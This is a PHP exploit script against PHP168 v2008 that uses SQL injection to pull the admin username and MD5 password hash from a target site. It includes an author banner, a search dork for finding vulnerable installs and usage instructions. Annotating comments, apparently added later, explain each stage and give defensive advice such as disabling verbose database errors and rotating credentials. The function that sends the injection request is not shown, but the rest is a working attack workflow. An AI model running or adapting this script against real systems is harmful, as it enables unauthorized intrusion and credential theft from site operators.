
+---------------------------------------------------------------------------+
Php168 v2008 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168 V2008"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
// Argument guard: the script expects two positional arguments (host, path).
// With fewer than two, it prints the usage banner below and stops, so no
// request is sent. $argv[0] is the script's own name as invoked.
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to php168
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
// Nothing below runs unless both arguments were supplied.
exit;
}

// 7 == E_ERROR | E_WARNING | E_PARSE: notices and deprecations are not reported.
error_reporting(7);
// 0 removes PHP's execution time limit for this run.
ini_set('max_execution_time', 0);

// Host and application path come straight from the command line, unvalidated.
$host = $argv[1];
$path = $argv[2];

// send() is defined outside this excerpt, so the request it builds is not
// visible here. It is called without arguments; presumably it reads $host,
// $path and (on the second call) $pre as globals -- confirm against its
// definition before renaming or reordering anything in this block.
$resp = send();
// Stage 1: look for "<prefix>_article" in the response and capture the
// lowercase alphanumeric prefix into $pre[1].
// NOTE(review): this looks like a table name leaking through a database error
// message -- an assumption, since the request is not shown. Defender takeaway:
// an application that returns raw SQL error text to the client discloses its
// schema; verbose database errors should be disabled in production.
preg_match('/([a-z0-9]+)_article/', $resp, $pre);

// preg_match() leaves $pre as an empty array (falsy) when nothing matched.
if ($pre)
$resp = send();
else
exit("Exploit Failed!\n");

// Stage 2: look for "content_<non-whitespace>|<32 chars of [a-z0-9]>" in the
// second response. Group 1 is printed as the admin name, group 2 as the
// password hash.
// NOTE(review): the 32-character value is labelled MD5 by the script itself.
// MD5 password hashes are cheap to brute-force offline, so for an install that
// was reachable while vulnerable, treat the admin credentials as compromised:
// rotate them, apply the vendor fix, and review logs for responses containing
// SQL error text.
preg_match('/content_([\S]+)\|([a-z0-9]{32})/', $resp, $pwd);

// The output strings below are runtime text and are kept verbatim, including
// the "Expoilt" misspelling in the original.
if ($pwd)
exit("Expoilt Success!\nadmin:\t$pwd[1]\nPassword(md5):\t$pwd[2]\n");
else
exit("Exploit Failed!\n");